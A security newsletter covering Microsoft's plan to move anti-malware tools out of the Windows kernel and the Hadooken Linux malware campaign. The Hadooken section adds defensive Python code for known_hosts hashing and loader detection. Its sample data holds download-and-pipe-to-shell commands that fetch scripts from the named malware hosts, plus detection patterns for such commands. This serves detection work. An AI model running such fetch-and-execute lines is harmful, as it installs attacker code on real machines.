
Netizen: Monday Security Brief (9/16/2024)

Today’s Topics:

  • Windows 11 to Redefine How Anti-Malware Tools Operate After Costly Disruption
  • Hadooken Malware: A Powerful Combo Attack of Crypto Mining and DDoS on Linux Servers
  • How can Netizen help?

Windows 11 to Redefine How Anti-Malware Tools Operate After Costly Disruption

The fallout from July's major IT disruption, caused by a faulty CrowdStrike update that crashed Windows hosts worldwide, has spurred Microsoft to rethink how anti-malware tools interact with the Windows kernel. With billions of dollars lost and systems across every sector affected, Microsoft is now focusing on making Windows 11 more resilient by changing how third-party security vendors operate on the platform.

In response, Microsoft plans a fundamental change in how security software integrates with its operating system. Rather than letting these tools run inside the Windows kernel, where a fault in any driver takes down the whole machine instead of a single process, the company is redesigning its platform so that third-party vendors can do their work outside kernel mode. This effort, still in development, aims to prevent a repeat of the July outage that left CrowdStrike customers scrambling to recover their machines.

David Weston, Microsoft’s Vice President of Enterprise and OS Security, outlined the company’s approach following a summit held in Redmond. Weston said the goal is to boost both security and system stability without the inherent risks that come with kernel-level access. According to him, these changes are designed to better support security vendors while increasing the flexibility and reliability of Windows-based systems.

“Our focus is on ensuring solution providers can secure systems without needing kernel access,” Weston said. “With Windows 11, we can offer greater flexibility by moving vendors out of the kernel, while still maintaining the necessary level of protection.”

Microsoft’s push also includes reinforcing Safe Deployment Practices (SDP) for Endpoint Detection and Response (EDR) vendors. SDP calls for a phased, controlled release of updates: a small ring of machines first, with health monitoring and a tested rollback path before the next ring, so that a bad update is caught before it reaches a large user base. Weston highlighted how this could prevent incidents like the July CrowdStrike update, where a single faulty release caused significant downtime and disruption for many businesses.

The summit also addressed the hard parts of this move: a security agent running outside kernel mode must still see enough of the system to detect threats, and it must be protected from being killed, unloaded or modified by malware even though it no longer holds kernel privileges of its own. Microsoft is particularly focused on ensuring the next generation of security tools doesn’t compromise system performance while remaining resistant to such tampering.

As part of this broader strategy, Microsoft is encouraging vendors to share more information about their products’ stability and compatibility, not only during development but after updates are released. This transparency is meant to foster greater cooperation between Microsoft and its security partners, ensuring a more streamlined response when incidents occur.

By overhauling how third-party tools interact with its system, Microsoft is clearly signaling a shift toward long-term reliability. The upcoming platform changes in Windows 11 could set a new precedent for how security software integrates with operating systems, minimizing the risk of widespread outages while keeping critical systems secure.


Hadooken Malware: A Powerful Combo Attack of Crypto Mining and DDoS on Linux Servers

A newly discovered malware campaign is targeting Linux environments by exploiting vulnerabilities in Oracle WebLogic Server to conduct cryptocurrency mining and spread botnet malware, according to cloud security researchers at Aqua Security.

The malware, dubbed Hadooken, is designed to infiltrate Linux-based systems and deliver a double payload: a cryptocurrency miner and a distributed denial-of-service (DDoS) bot known as Tsunami (also called Kaiten). Tsunami has previously been linked to attacks on Jenkins and WebLogic services deployed within Kubernetes environments.

The attackers gain their initial foothold through known WebLogic vulnerabilities and common misconfigurations such as weak administrative credentials. Once in, they execute code through two loader payloads, one written in Python and the other a shell script; both retrieve Hadooken from remote servers at 89.185.85[.]102 or 185.174.136[.]204.

One notable aspect of the shell-script loader is that it combs through directories holding SSH data, such as user credentials and host information, and uses what it finds to reach connected systems over SSH, spreading Hadooken laterally within the targeted infrastructure.
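The SSH harvesting described above has a direct countermeasure worth showing. The following is an added example, not Aqua Security's code, not Hadooken's, and not part of this brief: it lists what an attacker can read straight out of an unhashed known_hosts file, and it applies the same transformation OpenSSH uses when HashKnownHosts is set (or when ssh-keygen -H is run on an existing file), which removes the host names while ssh can still match them on connect. The sample known_hosts content is constructed.

```python
"""Audit an OpenSSH known_hosts file for plaintext host entries and hash them.

Added example, not Aqua Security's or Hadooken's code. A loader that reads
~/.ssh/known_hosts gets a ready list of lateral-movement targets unless the
entries are stored hashed (HashKnownHosts yes in ssh_config, or ssh-keygen -H
on an existing file). The sample file content below is constructed.
"""
import base64
import hashlib
import hmac
import os

# Constructed sample: two plaintext entries (one with an IP alias, one with a
# non-default port), one already-hashed entry, a certificate-authority marker
# line with a wildcard pattern, a comment and a blank line. Keys are truncated.
SAMPLE_KNOWN_HOSTS = """\
# constructed sample, keys truncated
db01.internal,10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGxbb2dz
[build.internal]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0
|1|ZmFrZXNhbHRmYWtlc2FsdGZha2U=|3SYd0dxwT8pXz1yq0v2AK1O/Y0c= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKey

@cert-authority *.corp ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDx
"""

def parse_known_hosts(text):
    """Return (plaintext_hosts, hashed_count).

    plaintext_hosts lists every host pattern an attacker can read off the
    file directly; hashed entries (|1|salt|hmac) only add to the count,
    because the host name cannot be recovered from them.
    """
    plaintext, hashed = [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):          # @cert-authority / @revoked marker
            fields = fields[1:]
        if len(fields) < 3:                    # expect: hosts keytype key [comment]
            continue
        if fields[0].startswith("|1|"):
            hashed += 1
        else:
            plaintext.extend(fields[0].split(","))
    return plaintext, hashed

def hash_known_host(hostname, salt=None):
    """Build the |1|salt|hmac host field OpenSSH writes for a hashed entry:
    HMAC-SHA1 keyed with a 20-byte random salt over the host name, both
    base64-encoded. A fixed salt is only for deterministic testing."""
    if salt is None:
        salt = os.urandom(20)
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(),
                          base64.b64encode(mac).decode())

def matches_hashed_host(hostfield, hostname):
    """What ssh does on connect: recompute the HMAC with the stored salt and
    compare in constant time. Only the salt is stored, so the file cannot be
    turned back into a host list."""
    parts = hostfield.split("|")
    if len(parts) != 4 or parts[1] != "1":
        return False
    salt, mac = base64.b64decode(parts[2]), base64.b64decode(parts[3])
    expected = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, mac)

def hash_all(text):
    """Rewrite known_hosts content with every plaintext host hashed, one line
    per host pattern (the shape ssh-keygen -H produces). Marker lines and
    wildcard patterns are left as they are: hashed matching is exact, so a
    hashed wildcard could never match anything."""
    out = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or s.startswith("@") or s.startswith("|1|"):
            out.append(line)
            continue
        hosts, _, rest = s.partition(" ")
        if not rest:
            out.append(line)
            continue
        for host in hosts.split(","):
            if "*" in host or "?" in host:
                out.append(host + " " + rest)
            else:
                out.append(hash_known_host(host) + " " + rest)
    return "\n".join(out) + "\n"
```

Running parse_known_hosts over a fleet's home directories gives a quick count of how many servers still hand an intruder a host list; hash_all (or simply ssh-keygen -H) closes that gap, though shell history and ssh_config Host stanzas still need the same attention.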

Once Hadooken is running, it drops both a cryptocurrency miner and the Tsunami bot, the latter of which has been linked to attacks on Kubernetes environments. The malware persists by creating cron jobs that relaunch the miner; the jobs are scheduled at varying intervals so the activity does not form a regular, easily spotted pattern.

Hadooken employs several defense-evasion tactics, including Base64-encoded payloads and running its malicious processes under benign-looking names such as “bash” and “java,” so that a glance at a process listing shows nothing out of place. It also cleans up after itself, deleting artifacts of its activity once execution is complete.
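To turn the persistence and evasion traits in the two paragraphs above into something a Linux host check can act on, here is an added example using this editor's heuristics; it is not Aqua Security's detection logic and not code from the brief. It flags cron entries that decode or download-and-pipe a payload (including loaders hidden inside Base64 arguments), processes named bash or java whose binary lives in a temporary directory, carries a different name, or was deleted while still running, and connections to the two download hosts named above. The crontab, process table and connection list are constructed sample data; on a real host they would come from the crontab files, /proc/<pid>/comm, /proc/<pid>/exe and the socket table.

```python
"""Flag Hadooken-style persistence and evasion in Linux host telemetry.

Added example with this editor's heuristics; it is not Aqua Security's
detection logic and not code from the brief. All sample data below are
constructed. On a real host the inputs come from the crontab files,
/proc/<pid>/comm, /proc/<pid>/exe (a readlink) and the socket table.
"""
import base64
import re

# Download hosts named in the Aqua report (written undefanged so they match).
IOC_IPS = ("89.185.85.102", "185.174.136.204")

# A loader line of the kind cron is made to run, Base64-wrapped the way the
# report describes; built here so the sample is plainly constructed.
_B64_LOADER = base64.b64encode(b"curl -s http://89.185.85.102/c.sh | bash").decode()

SAMPLE_CRONTAB = """\
# constructed sample crontab: two normal jobs and two loader jobs
0 3 * * * /usr/bin/apt-get -y autoclean
*/17 * * * * echo %s | base64 -d | bash
@reboot wget -q -O- http://185.174.136.204/c.sh | sh
30 2 * * 0 /usr/local/bin/backup.sh
""" % _B64_LOADER

# Constructed process table as (pid, comm, exe, cmdline).
SAMPLE_PROCS = [
    (1023, "bash", "/usr/bin/bash", "-bash"),
    (2210, "java", "/opt/oracle/wls/jdk/bin/java", "java weblogic.Server"),
    (4471, "java", "/tmp/.x/java", "java"),                  # miner renamed to java in /tmp
    (4480, "bash", "/var/tmp/-bash", "-bash"),               # miner masquerading as a login shell
    (4490, "bash", "/usr/local/bin/bash (deleted)", "bash"), # binary removed after launch
]

# Constructed connection table as (pid, remote_ip, remote_port).
SAMPLE_CONNS = [(2210, "10.0.0.5", 1521),
                (4471, "89.185.85.102", 80),
                (4480, "185.174.136.204", 443)]

CRON_PATTERNS = [
    (r"base64\s+(-d|--decode)\b", "decodes a Base64 payload"),
    (r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", "downloads and pipes to a shell"),
    (r"/(tmp|var/tmp|dev/shm)/", "runs something from a world-writable directory"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def scan_command(cmd):
    """Return the reasons a cron command looks like a loader. Base64-looking
    arguments are decoded and scanned too, so wrapping the loader does not
    hide it."""
    reasons = [why for pat, why in CRON_PATTERNS if re.search(pat, cmd)]
    reasons += ["contacts known Hadooken host " + ip for ip in IOC_IPS if ip in cmd]
    for token in B64_TOKEN.findall(cmd):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8", "ignore")
        except ValueError:        # not actually Base64 (long paths can look like it)
            continue
        reasons += ["decoded payload: " + r for r in scan_command(decoded)]
    return reasons

def suspicious_cron_entries(text):
    """Parse crontab text and return [(schedule, command, reasons)] for the
    entries that trip a heuristic. Handles @reboot-style schedules."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:              # VAR=value lines and malformed entries
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        reasons = scan_command(cmd)
        if reasons:
            hits.append((sched, cmd, reasons))
    return hits

MASQUERADE_NAMES = {"bash", "java"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def suspicious_processes(procs):
    """Return [(pid, reasons)] for processes that carry a benign name but whose
    backing binary is in the wrong place, has a different name, or is gone."""
    hits = []
    for pid, comm, exe, _cmdline in procs:
        if comm not in MASQUERADE_NAMES:
            continue
        reasons = []
        deleted = exe.endswith(" (deleted)")          # how /proc/<pid>/exe reports it
        path = exe[: -len(" (deleted)")] if deleted else exe
        if deleted:
            reasons.append("binary deleted while process still running")
        if path.startswith(WRITABLE_DIRS):
            reasons.append("binary lives in a world-writable directory")
        if path.rsplit("/", 1)[-1] != comm:
            reasons.append("process name %r does not match binary %r" % (comm, path))
        if reasons:
            hits.append((pid, reasons))
    return hits

def ioc_connections(conns):
    """Return connections whose remote address is one of the download hosts."""
    return [c for c in conns if c[1] in IOC_IPS]
```

The process check relies on the fact that the kernel derives a process's comm from the executable's file name, so a miner renamed to "java" is only caught by where the file sits, by a name mismatch, or by the "(deleted)" marker the exe link shows once the loader has removed the binary; the IOC list should be treated as a point-in-time indicator, since the hosting provider described below rotates addresses freely.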

Both IP addresses linked to the malware, 89.185.85[.]102 and 185.174.136[.]204, are associated with the hosting company Aeza International LTD. Aeza is a bulletproof hosting provider with operations based in Germany and links to data centers in Moscow and Frankfurt. Such providers are notorious for sheltering cybercriminals and ignoring abuse reports, which makes their customers’ operations difficult to trace and shut down.

A report from cybersecurity firm Uptycs in February 2024 had previously linked Aeza to the 8220 Gang, another cybercrime group, responsible for a cryptomining campaign exploiting vulnerabilities in Apache Log4j and Atlassian Confluence.

With its multi-faceted attack strategy—combining cryptocurrency mining, lateral movement, and DDoS botnet deployment—Hadooken poses a significant threat to organizations running vulnerable systems.

Security teams managing Linux systems, especially those running Oracle WebLogic or Kubernetes, should keep WebLogic patched, replace weak or default administrative credentials and keep the administration console off the internet, and have monitoring in place for the signs described above: new or unexpected cron entries, processes named “bash” or “java” running from unusual locations, unfamiliar SSH sessions between servers, and outbound connections to the two IP addresses listed.


How Can Netizen Help?

Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service”, through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


Copyright © Netizen Corporation. All Rights Reserved.